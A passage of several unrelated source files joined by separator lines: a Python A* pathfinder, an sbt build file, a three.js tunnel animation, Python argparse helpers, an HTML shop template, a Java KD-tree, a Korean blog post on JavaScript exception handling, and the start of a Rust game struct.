        if 0 <= cell[0] < width and 0 <= cell[1] < height and cell not in obstacles
    ]
#Retrieve cost of cell; defaults to 1 if not explicitly weighted
def getCost(a, weightedCells):
    """Return the traversal cost of cell *a*; unweighted cells cost 1."""
    if a in weightedCells:
        return weightedCells[a]
    return 1
#Function to find least cost path
def findPath2():
    """Run A* search over a grid supplied by sim2.getGrid.

    Grid height/width come from argv[1]/argv[2] when numeric; any missing
    or invalid dimension falls back to a random value in [10, 20].

    Returns (prev, cost, start, goal, size, obstacles, weightedCells, isFound):
      prev    -- map cell -> predecessor on the best known path
      cost    -- map cell -> cheapest cost found from start (g-value)
      isFound -- True when the goal was reached
    """
    # Check for valid command-line arguments, otherwise set defaults.
    if len(sys.argv) < 3 or sys.argv[1] is None or not str.isnumeric(sys.argv[1]):
        height = random.randint(10, 20)
    else:
        height = int(sys.argv[1])
    if len(sys.argv) < 3 or sys.argv[2] is None or not str.isnumeric(sys.argv[2]):
        width = random.randint(10, 20)
    else:
        width = int(sys.argv[2])
    size = (width, height)
    # Retrieving Grid data from function that creates the grid.
    obstacles, start, goal, weightedCells = sim2.getGrid(size)
    prev = {start: None}  # path predecessors
    cost = {start: 0}     # best known g(x) per cell
    isFound = False
    lead = PQ()
    lead.insert(start, 0)
    while not lead.isEmpty():
        cell = lead.get()
        if cell == goal:
            isFound = True
            break
        # Expand the cheapest frontier cell into its free neighbours.
        # Renamed loop variable from 'next' to avoid shadowing the builtin.
        for neighbor in checkAdj(size, cell, obstacles):
            g_x = cost[cell] + getCost(neighbor, weightedCells)
            if neighbor not in cost or g_x < cost[neighbor]:
                cost[neighbor] = g_x
                (x1, y1) = goal
                (x2, y2) = neighbor
                # Manhattan distance: admissible heuristic on a 4-connected grid.
                h_x = abs(x1 - x2) + abs(y1 - y2)
                f_x = g_x + h_x  # total estimate = cost so far + cost to goal
                lead.insert(neighbor, f_x)
                prev[neighbor] = cell  # update path list
    return prev, cost, start, goal, size, obstacles, weightedCells, isFound
# Run the search once at import time and unpack all grid/search results
# for the display code below.
prev, cost, start, goal, size, obstacles, weightedCells,isFound = findPath2()
#function for Printing the formatted Grid based on inputs
def printGrid(size, obstacles, start, goal, weightedCells, **var):
    """Pretty-print the grid with termcolor colouring.

    Obstacles are red 'X', free cells white '.', weighted cells magenta
    digits, start/goal cyan 'S'/'G'. Pass route=<iterable of cells> to
    overlay the solved path as green 'o' markers.
    """
    print("Start: ", start, "\n")
    print("Goal: ", goal, "\n")
    (w, h) = size
    for x in range(w):
        for y in range(h):
            index = (x, y)
            # Decide the cell symbol; later checks override earlier ones.
            el = ". "
            if index in weightedCells:
                el = str(getCost(index, weightedCells)) + ' '
            if index in obstacles:
                el = "X "
            if 'route' in var and index in var['route']:
                el = "o "
            if index == goal:
                el = 'G '
            if index == start:
                el = 'S '
            # Colour per symbol class.
            if el == "o ":
                print(colored(el, 'green'), end="")
            elif el == ". ":
                print(colored(el, 'white'), end="")
            elif el == "X ":
                print(colored(el, 'red'), end="")
            elif el == "S " or el == "G ":
                print(colored(el, 'cyan'), end="")
            else:
                print(colored(el, 'magenta'), end="")
        print(" ", x)  # row number at the end of each line
#Retrieve traversed path from path list
def getPath(prev, start, goal):
    """Walk the predecessor map back from *goal* to *start* and return
    the route as a list of cells, goal first."""
    route = [goal]
    step = goal
    while step != start:
        step = prev[step]
        route.append(step)
    return route
#Display for feasible path to goal
# When no path exists show the bare grid plus a message; otherwise show the
# grid once plain and once with the solved route overlaid.
if isFound:
    printGrid(size, obstacles, start, goal, weightedCells)
    print()
    # Print grid with path found
    printGrid(size, obstacles, start, goal, weightedCells, route=getPath(prev, start, goal))
else:
    printGrid(size, obstacles, start, goal, weightedCells)
    print("No path available")
|
// sbt build definition for the jsi-server Play (Java) application.
// Project identity and release coordinates.
name := """jsi-server"""
organization := "com.saasquatch"
version := "1.0-SNAPSHOT"
// Root Play-Java project rooted at this directory.
lazy val root = (project in file(".")).enablePlugins(PlayJava)
scalaVersion := "2.13.1"
// Eclipse IDE integration: Java flavour, compile before generating
// metadata, and include managed sources plus javadoc/source attachments.
EclipseKeys.projectFlavor := EclipseProjectFlavor.Java
EclipseKeys.executionEnvironment := Some(EclipseExecutionEnvironment.JavaSE18)
EclipseKeys.preTasks := Seq(compile in Compile)
EclipseKeys.createSrc := EclipseCreateSrc.ValueSet(EclipseCreateSrc.ManagedClasses, EclipseCreateSrc.ManagedResources)
EclipseKeys.withJavadoc := true
EclipseKeys.withSource := true
// Extra resolvers: jitpack (GitHub artifacts) and the saasquatch bintray repo.
resolvers ++= Seq(
  "jitpack" at "https://jitpack.io",
  "bintray-saasquatch-java-libs" at "https://dl.bintray.com/saasquatch/java-libs"
)
// Runtime dependencies: Guice DI (Play default), the json-schema-inferrer
// library, and commons-validator for input validation.
libraryDependencies ++= Seq(
  guice,
  "com.github.saasquatch" % "json-schema-inferrer" % "0.1.1-alpha-43",
  "commons-validator" % "commons-validator" % "1.6"
)
|
// Viewport size, tunnel geometry constants, and the WebGL renderer/scene
// shared by the rest of the experience.
var ww = window.innerWidth,
  wh = window.innerHeight;
var curve;            // Catmull-Rom path of the tunnel; set in createTube()
var lengthTube = 600; // depth of the tunnel along -Z
var detailTube = 200; // number of samples along the curve
var radius = 6;       // tunnel radius used when placing particles
var logoDist = 10;    // distance of the logo plane past the tunnel end
var renderer = new THREE.WebGLRenderer({
  canvas: document.querySelector("canvas"),
  antialias: true
});
renderer.setSize(ww, wh);
var scene = new THREE.Scene();
scene.fog = new THREE.Fog(0x000000,50,150);
var camera = new THREE.PerspectiveCamera(45, ww / wh, 0.0001, 100000);
/* ==================== */
/* ===== ON RESIZE ==== */
/* ==================== */
// Keep camera aspect ratio and renderer size in sync with the window.
window.addEventListener("resize", function() {
  ww = window.innerWidth;
  wh = window.innerHeight;
  camera.aspect = ww / wh;
  camera.updateProjectionMatrix();
  renderer.setSize(ww, wh);
});
/* ==================== */
/* == MOUSE POSITION == */
/* ==================== */
// World-space point the pointer is aiming at, on the plane of the logo.
var mouse = new THREE.Vector3(0,0,0);
window.addEventListener("mousemove", onMouseMove);
window.addEventListener("touchmove", onMouseMove);
var mouseVector = new THREE.Vector3();
// Translate a mouse/touch event into a world-space position by unprojecting
// the pointer through the camera and extending the ray to the logo depth.
function onMouseMove(e) {
  var x = 0;
  var y = 0;
  if(e.type === "touchmove"){
    x = e.touches[0].clientX;
    y = e.touches[0].clientY;
  }
  else{
    x = e.clientX;
    y = e.clientY;
  }
  // Normalised device coordinates (-1..1), then unproject into the scene.
  mouseVector.set(( x / ww ) * 2 - 1, -( y / wh ) * 2 + 1,0.5);
  mouseVector.unproject(camera);
  var dir = mouseVector.sub(camera.position).normalize();
  var distance = Math.abs(lengthTube + logoDist) - Math.abs(camera.position.z);
  mouse = camera.position.clone().add( dir.multiplyScalar( distance ) );
}
/* ==================== */
/* === Wishes Text ==== */
/* ==================== */
// Group holding the greeting-text planes placed along the tunnel.
var wishes = new THREE.Object3D();
scene.add(wishes);
// Place the four "copy" textures on planes at fixed fractions of the curve.
// Refactored from four copy-pasted blocks into one data-driven loop; the
// first plane keeps its small positional offset from the original code.
function addCopy(){
  var geometry = new THREE.PlaneGeometry(radius, 0.25*radius);
  var copies = [
    { texture: "../img/copy00.png", at: 0.2, offsetX: 0.05, offsetY: 0.25 },
    { texture: "../img/copy01.png", at: 0.4, offsetX: 0,    offsetY: 0 },
    { texture: "../img/copy02.png", at: 0.6, offsetX: 0,    offsetY: 0 },
    { texture: "../img/copy03.png", at: 0.8, offsetX: 0,    offsetY: 0 }
  ];
  for (var i = 0; i < copies.length; i++) {
    var copy = copies[i];
    var material = new THREE.MeshBasicMaterial({
      map: new THREE.TextureLoader().load(copy.texture),
      transparent: true
    });
    var plane = new THREE.Mesh(geometry, material);
    plane.position.copy(curve.getPointAt(copy.at));
    plane.position.x += copy.offsetX;
    plane.position.y += copy.offsetY;
    wishes.add(plane);
  }
}
/* ====================== */
/* === Path creation ==== */
/* ====================== */
var particles = new THREE.Object3D();
var particlesLogo = new THREE.Object3D();
scene.add(particles);
scene.add(particlesLogo);
noise.seed(0.05);
// Build the tunnel curve and scatter two particle clouds along it:
// `particles` stays on the tube wall, `particlesLogo` later flies to the logo.
function createTube() {
  //Create the 'tube': sample a noisy path heading straight down -Z.
  var points = [];
  for (var i = 0; i < detailTube; i++) {
    var x = noise.simplex2(i * 0.01, 0.01) * 50;
    // var x = 0;
    // Y is flat; the original computed an unused simplex value for y and
    // immediately overwrote it with 0 (dead code removed).
    var y = 0;
    var z = -(i/detailTube) * lengthTube;
    points.push(new THREE.Vector3(x, y, z));
  }
  curve = new THREE.CatmullRomCurve3(points);
  //Create the particles
  var geom = new THREE.Geometry();
  var geomLogo = new THREE.Geometry();
  var frames = curve.computeFrenetFrames( detailTube, true );
  var endPoint = curve.getPointAt(1);
  for (var i = 0; i < detailTube; i++) {
    var N = frames.normals[ i ];
    var B = frames.binormals[ i ];
    for (var j = 0; j < 80; j++) {
      // Jitter the sample position slightly along the curve, clamped to [0,1].
      var index = (i / detailTube)+(Math.random()-0.5)*0.01;
      index = Math.max(0,Math.min(index,1) );
      var p = curve.getPointAt(index);
      var position = p.clone();
      // Random angle around the tube cross-section (Frenet frame).
      var angleRotate = Math.random()*Math.PI*2;
      var sin = Math.sin( angleRotate );
      var cos = - Math.cos( angleRotate );
      var normal = new THREE.Vector3();
      normal.x = ( cos * N.x + sin * B.x );
      normal.y = ( cos * N.y + sin * B.y );
      normal.z = ( cos * N.z + sin * B.z );
      normal.normalize();
      position.x = p.x + radius * normal.x;
      position.y = p.y + radius * normal.y;
      position.z = p.z + radius * normal.z;
      // Per-particle physics state consumed by render().
      position.vx = 0;
      position.vy = 0;
      position.vz = 0;
      position.accX = 0;
      position.accY = 0;
      position.accZ = 0;
      position.speed = Math.random()+0.2;
      position.friction = Math.random() * 0.04 + 0.95;
      position.frictionZ = Math.random() * 0.04 + 0.90;
      if(j<20){
        // A quarter of the particles target a random pixel of the logo.
        var destDot = logoParticles[Math.floor(logoParticles.length * Math.random())].clone();
        destDot.x += endPoint.x;
        destDot.y += endPoint.y;
        var angle = destDot.angleTo(endPoint);
        destDot.applyAxisAngle(destDot.clone().normalize(), angle*10);
        position.dest = destDot;
        // Gentle endless drift via relative tweens. BUG FIX: the original
        // ternary had the wrong precedence — (cond ? "+" : "-"+"="+n) —
        // yielding a bare "+" half the time instead of "+=n"; parenthesise
        // so it always forms a valid "+=n" / "-=n" relative value.
        TweenMax.to(position, Math.random()*8+5,{
          x : ((Math.random()>0.5)?"+":"-")+"="+Math.random()*2,
          y : ((Math.random()>0.5)?"+":"-")+"="+Math.random()*2,
          z : ((Math.random()>0.5)?"+":"-")+"="+Math.random()*2,
          ease:Power2.easeOut,
          delay : -Math.random()*13,
          repeat:-1,
          yoyo:true
        });
        geomLogo.vertices.push(position);
      }
      else{
        // Wall particles rest where they were spawned.
        position.dest = new THREE.Vector3(position.x, position.y, position.z);
        geom.vertices.push(position);
      }
    }
  }
  // Tiny plain points for the tunnel wall...
  var mat = new THREE.PointsMaterial({
    color: 0xffffff,
    size: 0.01,
    sizeAttenuation: true
  });
  var dots = new THREE.Points(geom, mat);
  particles.add(dots);
  // ...and larger textured, translucent points for the logo swarm.
  var mat = new THREE.PointsMaterial({
    color: 0xffffff,
    size: 0.2,
    opacity : 0.5,
    transparent:true,
    map : new THREE.TextureLoader().load("https://s3-us-west-2.amazonaws.com/s.cdpn.io/127738/dotTexture.png"),
    sizeAttenuation: true
  });
  var dotsLogo = new THREE.Points(geomLogo, mat);
  particlesLogo.add(dotsLogo);
}
var showLogo = false;
// Load the logo image cross-origin; once loaded, sample it into particles.
var logoImage = new Image();
logoImage.crossOrigin = "";
logoImage.onload = getDataLogo;
logoImage.src = "https://s3-us-west-2.amazonaws.com/s.cdpn.io/127738/emakinaLogo.png"
var logoParticles = [];
// Rasterise the logo into an offscreen canvas and convert every
// sufficiently-opaque pixel (alpha > 150) into a 3D target point placed
// just past the end of the tunnel. Then build the scene and start rendering.
function getDataLogo() {
  var canvas = document.createElement("canvas"),
    ctx = canvas.getContext("2d");
  canvas.width = 160;
  canvas.height = 349;
  ctx.drawImage(logoImage, 0, 0, 160, 349);
  var data = ctx.getImageData(0, 0, 160, 349).data;
  // Sample every 2nd pixel on both axes to keep the particle count down.
  for (var i = 0; i < 160; i+=2) {
    for (var j = 0; j < 349; j+=2) {
      if (data[((i + j * 160) * 4) + 3] > 150) {
        // Centre the logo around the origin and scale to scene units.
        var pixel = new THREE.Vector3(i - 80, -j + 174, 1).multiplyScalar(radius*0.003);
        pixel.z = -lengthTube-logoDist;
        logoParticles.push(pixel);
      }
    }
  }
  createTube();
  addCopy();
  requestAnimationFrame(render);
  introTl.play();
}
// Camera progress along the curve (0..1); tweened by the timelines below.
var interval = 0.0005;
var progress = {
  z: 0
};
// Per-frame update: move the camera along the curve, run the logo-particle
// spring physics once the camera is far enough in, and draw the scene.
function render(a) {
  requestAnimationFrame(render);
  var tempProgress = progress.z;
  // Look from the current curve point toward a point slightly ahead.
  var p1 = curve.getPointAt(tempProgress);
  var p2 = curve.getPointAt(tempProgress + interval);
  camera.position.set(p1.x, p1.y, p1.z);
  camera.lookAt(p2);
  var par = "";
  if (showLogo) {
    for (var i = 0; i < particlesLogo.children[0].geometry.vertices.length; i++) {
      par = particlesLogo.children[0].geometry.vertices[i];
      // Spring toward the particle's destination...
      par.accX = (par.dest.x - par.x) * 0.003 * par.speed;
      par.accY = (par.dest.y - par.y) * 0.003 * par.speed;
      par.accZ = (par.dest.z - par.z) * 0.005 * par.speed;
      par.vx += par.accX;
      par.vy += par.accY;
      par.vz += par.accZ;
      // ...with per-particle damping.
      par.vx *= par.friction;
      par.vy *= par.friction;
      par.vz *= par.frictionZ;
      par.x += par.vx;
      par.y += par.vy;
      par.z += par.vz;
      // Repel particles within range of the pointer.
      var distance = mouse.distanceTo(par);
      if (distance < 0.8) {
        par.accX = (par.x - mouse.x) / 70;
        par.accY = (par.y - mouse.y) / 70;
        par.vx += par.accX;
        par.vy += par.accY;
      }
    }
  }
  // Start the logo assembly once the camera is 85% through the tunnel.
  if(!showLogo && tempProgress > 0.85){
    showLogo = true;
  }
  // BUG FIX: the original loop condition was `i < wishes.children` —
  // comparing the index against the array object itself, which is never
  // true, so the text planes never turned to face the camera.
  for(var i=0;i<wishes.children.length;i++){
    wishes.children[i].lookAt(camera.position);
  }
  particlesLogo.children[0].geometry.verticesNeedUpdate = true;
  renderer.render(scene, camera);
}
/* INTRO ANIMATION */
// Intro timeline: fades the page in and reveals the intro copy; played
// from getDataLogo() once the logo pixels have been sampled.
var introTl = new TimelineMax({paused:true, delay:0.5});
introTl.to("body", 0.3, {
  opacity:1
});
introTl.from(".intro strong", 0.8, {
  opacity:0,
  y : "-30%",
  ease:Power1.easeOut
});
introTl.staggerFrom(".intro p", 0.8, {
  opacity:0,
  y : "-30%",
  ease:Power1.easeOut
},0.4);
introTl.from(".intro .start", 0.8, {
  opacity:0,
  ease:Power1.easeOut
});
// Main timeline: hides the intro, flies the camera down the tunnel by
// tweening progress.z in slow-motion segments, then reveals the outro.
var animTl = new TimelineMax({
  paused: true,
  repeat: 0
});
// animTl.timeScale(5);
animTl.set(".intro",{
  "pointer-events": "none"
});
animTl.staggerTo([".intro strong",".intro .copy", ".intro .start"], 0.3, {
  opacity:0,
  y : "-50%",
  ease:Power1.easeIn
}, 0.1);
animTl.to("canvas", 0.5, {
  opacity:1,
  ease: Power2.easeIn
}, "-=0.5");
// Camera fly-through: ease in, four slow-mo cruise segments, ease out.
animTl.to(progress, 2, {
  z: 0.1,
  ease: Power3.easeIn
});
animTl.to(progress, 4, {
  z: 0.28,
  ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 4, {
  z: 0.48,
  ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 4, {
  z: 0.68,
  ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 4, {
  z: 0.88,
  ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 2, {
  z: 0.988,
  ease: Power3.easeOut
});
animTl.to("canvas", 1, {
  opacity:0.5,
  ease: Power2.easeIn
});
// Outro reveal once the fly-through completes.
animTl.set(".outro",{
  "pointer-events": "auto"
});
animTl.from(".outro strong", 0.8, {
  opacity:0,
  y : "-30%",
  ease:Power1.easeOut
}, "+=1");
animTl.staggerFrom(".outro .copy p", 0.8, {
  opacity:0,
  y : "-50%",
  ease:Power1.easeOut
}, 0.4);
// Start button: go fullscreen on small screens, stop the idle drift tweens
// on the logo particles, then play the main fly-through timeline.
document.querySelector(".start").addEventListener("click", function(){
  if(ww < 900){
    toggleFullScreen();
  }
  // BUG FIX: `par` was assigned without declaration, leaking an implicit
  // global; declare it locally.
  for (var i = 0; i < particlesLogo.children[0].geometry.vertices.length; i++) {
    var par = particlesLogo.children[0].geometry.vertices[i];
    TweenMax.killTweensOf(par);
  }
  animTl.play();
});
// Toggle browser fullscreen, falling back through the vendor-prefixed
// APIs (standard, Mozilla, WebKit) that were current when this was written.
function toggleFullScreen() {
  var inFullscreen = document.fullscreenElement ||      // standard
    document.mozFullScreenElement ||                    // Firefox
    document.webkitFullscreenElement;                   // WebKit
  if (!inFullscreen) {
    var docEl = document.documentElement;
    if (docEl.requestFullscreen) {
      docEl.requestFullscreen();
    } else if (docEl.mozRequestFullScreen) {
      docEl.mozRequestFullScreen();
    } else if (docEl.webkitRequestFullscreen) {
      docEl.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
    }
  } else if (document.cancelFullScreen) {
    document.cancelFullScreen();
  } else if (document.mozCancelFullScreen) {
    document.mozCancelFullScreen();
  } else if (document.webkitCancelFullScreen) {
    document.webkitCancelFullScreen();
  }
}
|
'''
Parse command line arguments
'''
import argparse
def parse_args_common(argv=None):
    '''Parse common command line arguments.

    argv -- optional explicit argument list; defaults to sys.argv[1:].
            (Backward-compatible addition that makes the parser testable
            and reusable without touching sys.argv.)

    Returns the selected database backend name.
    '''
    parser = argparse.ArgumentParser(description='common args.')
    parser.add_argument('--dbenv', type=str, required=True,
                        help='Name of the database backend; '
                             'options: google_firestore, python_json')
    args = parser.parse_args(argv)
    return args.dbenv
def parse_args_main_postgresql(argv=None):
    '''Parse command line arguments for postgresql main.

    argv -- optional explicit argument list; defaults to sys.argv[1:]
            (backward-compatible addition for testability).

    Returns (dbenv, environment, ignore_errors).
    '''
    def str_to_bool(value):
        # BUG FIX: argparse's type=bool is a well-known trap — bool('False')
        # is True, so --ignore_errors False previously yielded True.
        # Interpret the usual falsy spellings explicitly instead.
        return value.strip().lower() not in ('false', '0', 'no', 'n', '')

    parser = argparse.ArgumentParser(description='common args')
    parser.add_argument('--dbenv', type=str, default="postgres_json",
                        help='Name of the database backend; '
                             'options: google_firestore, python_json, postgres_json')
    parser.add_argument('--environment', type=str, default="prod",
                        help='Name of the environment; '
                             'options: prod, test')
    parser.add_argument('--ignore_errors', type=str_to_bool, default=True,
                        help='Ignore possible non-fatal errors')
    args = parser.parse_args(argv)
    return args.dbenv, args.environment, args.ignore_errors
|
<!-- banner -->
<div id="myCarousel" class="carousel slide" data-ride="carousel">
<!-- Indicators -->
<ol class="carousel-indicators">
<li data-target="#myCarousel" data-slide-to="0" class="active"></li>
<li data-target="#myCarousel" data-slide-to="1" class=""></li>
<li data-target="#myCarousel" data-slide-to="2" class=""></li>
<li data-target="#myCarousel" data-slide-to="3" class=""></li>
<li data-target="#myCarousel" data-slide-to="4" class=""></li>
</ol>
<div class="carousel-inner" role="listbox">
<div class="item active">
<div class="container">
<div class="carousel-caption">
<h3>The Biggest <span>Sale</span></h3>
<p>Special for today</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item2">
<div class="container">
<div class="carousel-caption">
<h3>Summer <span>Collection</span></h3>
<p>New Arrivals On Sale</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item3">
<div class="container">
<div class="carousel-caption">
<h3>The Biggest <span>Sale</span></h3>
<p>Special for today</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item4">
<div class="container">
<div class="carousel-caption">
<h3>Summer <span>Collection</span></h3>
<p>New Arrivals On Sale</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item5">
<div class="container">
<div class="carousel-caption">
<h3>The Biggest <span>Sale</span></h3>
<p>Special for today</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
</div>
<a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev">
<span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="right carousel-control" href="#myCarousel" role="button" data-slide="next">
<span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
<!-- The Modal -->
</div>
<!-- //banner -->
<div class="banner_bottom_agile_info">
<div class="container">
<div class="banner_bottom_agile_info_inner_w3ls">
<div class="col-md-6 wthree_banner_bottom_grid_three_left1 grid">
<figure class="effect-roxy">
<img src="{{ asset('public/images//bottom1.jpg') }}" alt=" " class="img-responsive" />
<figcaption>
<h3><span>F</span>all Ahead</h3>
<p>New Arrivals</p>
</figcaption>
</figure>
</div>
<div class="col-md-6 wthree_banner_bottom_grid_three_left1 grid">
<figure class="effect-roxy">
<img src="{{ asset('public/images//bottom2.jpg') }}" alt=" " class="img-responsive" />
<figcaption>
<h3><span>F</span>all Ahead</h3>
<p>New Arrivals</p>
</figcaption>
</figure>
</div>
<div class="clearfix"></div>
</div>
</div>
</div>
<!-- schedule-bottom -->
<div class="schedule-bottom">
<div class="col-md-6 agileinfo_schedule_bottom_left">
<img src="{{ asset('public/images//mid.jpg') }}" alt=" " class="img-responsive" />
</div>
<div class="col-md-6 agileits_schedule_bottom_right">
<div class="w3ls_schedule_bottom_right_grid">
<h3>Save up to <span>50%</span> in this week</h3>
<p>Suspendisse varius turpis efficitur erat laoreet dapibus.
Mauris sollicitudin scelerisque commodo.Nunc dapibus mauris sed metus finibus posuere.</p>
<div class="col-md-4 w3l_schedule_bottom_right_grid1">
<i class="fa fa-user-o" aria-hidden="true"></i>
<h4>Customers</h4>
<h5 class="counter">653</h5>
</div>
<div class="col-md-4 w3l_schedule_bottom_right_grid1">
<i class="fa fa-calendar-o" aria-hidden="true"></i>
<h4>Events</h4>
<h5 class="counter">823</h5>
</div>
<div class="col-md-4 w3l_schedule_bottom_right_grid1">
<i class="fa fa-shield" aria-hidden="true"></i>
<h4>Awards</h4>
<h5 class="counter">45</h5>
</div>
<div class="clearfix"> </div>
</div>
</div>
<div class="clearfix"> </div>
</div>
|
package com.revolsys.geometry.index.kdtree;
import java.util.ArrayList;
import java.util.List;
import java.util.function.Consumer;
import java.util.function.Predicate;
import org.jeometry.common.function.BiFunctionDouble;
import com.revolsys.geometry.model.BoundingBox;
import com.revolsys.geometry.model.GeometryFactory;
import com.revolsys.geometry.model.Point;
import com.revolsys.util.Emptyable;
/**
 * A 2D KD-tree index of point nodes. Coordinates are snapped to the
 * precision grid of the supplied {@link GeometryFactory}, and inserting a
 * point that already exists increments that node's counter instead of
 * adding a duplicate node.
 */
public class KdTree implements Emptyable {
  /** Number of distinct nodes in the tree. */
  private long size;

  /** Root node, or null while the tree is empty. */
  private KdNode root = null;

  private final GeometryFactory geometryFactory;

  /** Factory invoked with (x, y) to create new nodes. */
  private final BiFunctionDouble<KdNode> nodeFactory;

  /** XY precision scale; values <= 0 disable coordinate snapping. */
  private final double scaleXY;

  public KdTree() {
    this(GeometryFactory.DEFAULT_2D);
  }

  public KdTree(final BiFunctionDouble<KdNode> nodeFactory) {
    this(nodeFactory, GeometryFactory.DEFAULT_2D);
  }

  public KdTree(final BiFunctionDouble<KdNode> nodeFactory, final GeometryFactory geometryFactory) {
    this.nodeFactory = nodeFactory;
    this.geometryFactory = geometryFactory;
    this.scaleXY = geometryFactory.getScaleXY();
  }

  public KdTree(final GeometryFactory geometryFactory) {
    this(KdNode::new, geometryFactory);
  }

  /** Visit every node within the bounding box. */
  public <N extends KdNode> void forEachNode(final BoundingBox boundingBox,
    final Consumer<N> result) {
    final double minX = boundingBox.getMinX();
    final double minY = boundingBox.getMinY();
    final double maxX = boundingBox.getMaxX();
    final double maxY = boundingBox.getMaxY();
    forEachNode(minX, minY, maxX, maxY, result);
  }

  /** Visit every node within the bounding box that passes the filter. */
  public <N extends KdNode> void forEachNode(final BoundingBox boundingBox,
    final Predicate<? super N> filter, final Consumer<N> result) {
    final double minX = boundingBox.getMinX();
    final double minY = boundingBox.getMinY();
    final double maxX = boundingBox.getMaxX();
    final double maxY = boundingBox.getMaxY();
    forEachNode(minX, minY, maxX, maxY, filter, result);
  }

  /** Visit every node within the rectangle (minX, minY)-(maxX, maxY). */
  public <N extends KdNode> void forEachNode(final double minX, final double minY,
    final double maxX, final double maxY, final Consumer<N> result) {
    if (this.root != null) {
      this.root.forEachNode(true, minX, minY, maxX, maxY, result);
    }
  }

  /** Visit every node within the rectangle that passes the filter. */
  public <N extends KdNode> void forEachNode(final double minX, final double minY,
    final double maxX, final double maxY, final Predicate<? super N> filter,
    final Consumer<N> result) {
    if (this.root != null) {
      this.root.forEachNode(true, minX, minY, maxX, maxY, filter, result);
    }
  }

  public GeometryFactory getGeometryFactory() {
    return this.geometryFactory;
  }

  /** Collect all nodes within the bounding box into a list. */
  public <N extends KdNode> List<N> getItems(final BoundingBox boundingBox) {
    final List<N> result = new ArrayList<>();
    final Consumer<N> action = result::add;
    forEachNode(boundingBox, action);
    return result;
  }

  public long getSize() {
    return this.size;
  }

  /**
   * Insert the point (x, y), snapping to the precision grid first. If an
   * equal point already exists its node counter is incremented and the
   * existing node is returned; otherwise a new node is created.
   */
  @SuppressWarnings("unchecked")
  public <N extends KdNode> N insertPoint(double x, double y) {
    if (this.scaleXY > 0) {
      x = Math.round(x * this.scaleXY) / this.scaleXY;
      y = Math.round(y * this.scaleXY) / this.scaleXY;
    }
    if (this.root == null) {
      // BUG FIX: the original did not count the first node, leaving
      // getSize() == 0 and isEmpty() == true after the initial insert.
      this.size++;
      this.root = this.nodeFactory.accept(x, y);
      return (N)this.root;
    } else {
      KdNode currentNode = this.root;
      KdNode leafNode = this.root;
      // Alternate the splitting axis (X then Y) on each level.
      boolean isAxisX = true;
      boolean isLessThan = true;
      while (currentNode != null) {
        final double x2 = currentNode.getX();
        final double y2 = currentNode.getY();
        if (x2 == x && y2 == y) {
          // Duplicate point: bump the node's counter instead of inserting.
          currentNode.increment();
          return (N)currentNode;
        } else {
          if (isAxisX) {
            isLessThan = x < x2;
          } else {
            isLessThan = y < y2;
          }
          leafNode = currentNode;
          if (isLessThan) {
            currentNode = currentNode.getLeft();
          } else {
            currentNode = currentNode.getRight();
          }
          isAxisX = !isAxisX;
        }
      }
      // Fell off the tree: attach a new node under the last visited leaf.
      this.size = this.size + 1;
      final KdNode node = this.nodeFactory.accept(x, y);
      if (isLessThan) {
        leafNode.setLeft(node);
      } else {
        leafNode.setRight(node);
      }
      return (N)node;
    }
  }

  /** Insert a point after converting it to this tree's geometry factory. */
  public <N extends KdNode> N insertPoint(final Point point) {
    final Point convertedPoint = point.convertPoint2d(this.geometryFactory);
    final double x = convertedPoint.getX();
    final double y = convertedPoint.getY();
    return insertPoint(x, y);
  }

  @Override
  public boolean isEmpty() {
    return this.size == 0;
  }
}
|
---
layout: post
title: "[JS] Javascript 예외처리: try, catch, finally"
date: 2019-03-26
categories: Javascript
---
Javascript의 예외처리 방법에 대해 정리한 글입니다.
## 예외처리의 필요성
예상치 못하게 발생한 에러를 잘 처리해야 프로그램 전체가 멈추지 않고 동작할 수 있음
## Try, Catch, Finally
```javascript
try {
// 실행하고 싶은 코드
// 여기서 실행하다가 에러가 발생하면 catch 블록으로 이동
throw {전달할 e 값}; // catch 블록으로 이동
}
catch (e) {
// 에러가 발생했을 때,
// 에러를 파라미터로 받아서 처리함
}
finally {
// 가장 마지막에 항상 실행되어야 할 코드
}
```
* try는 반드시 있어야 함
* catch나 finally는 둘 중 하나만 있어도 실행 가능
* `throw` : 에러를 발생시키는 명령어
### 에러 처리 과정
throw가 발생하면 catch 구문을 찾아서 이동
* 현재 블록에 catch나 finally가 없는 경우 상위 블록이나 호출한 함수로 이동
* catch가 존재하지 않는 경우, finally를 실행하고, catch 될 수 있는 구문을 찾아서 이동
* catch 구문에서 에러가 처리되고, 이후 코드를 실행
|
use bbggez::{
color::random_dark_color,
ggez::{
graphics::{Color, Mesh},
nalgebra::{Point2, Vector2},
Context, GameResult,
},
mesh::create_circle,
};
/// A cannon ball: a coloured circle with simple Euler-integrated motion.
pub struct CannonBall {
    // Current position in world coordinates.
    location: Vector2<f32>,
    // Render colour; chosen randomly (dark) at construction.
    color: Color,
    // Radius of the drawn circle.
    size: f32,
    // Added to `location` on every `update()` call.
    velocity: Vector2<f32>,
}
impl CannonBall {
    /// Create a ball at `location` with radius `size`, a random dark
    /// colour and zero initial velocity.
    pub fn new(location: Vector2<f32>, size: f32) -> CannonBall {
        CannonBall {
            location,
            color: random_dark_color(),
            size,
            velocity: Vector2::new(0.0, 0.0),
        }
    }

    /// Build the circle mesh for this ball, centred at the origin; the
    /// caller positions it using `location()`.
    pub fn draw(&self, context: &mut Context) -> GameResult<Mesh> {
        Ok(create_circle(0.0, 0.0, self.size, self.color, context))
    }

    /// Current position as a point.
    pub fn location(&self) -> Point2<f32> {
        Point2::new(self.location.x, self.location.y)
    }

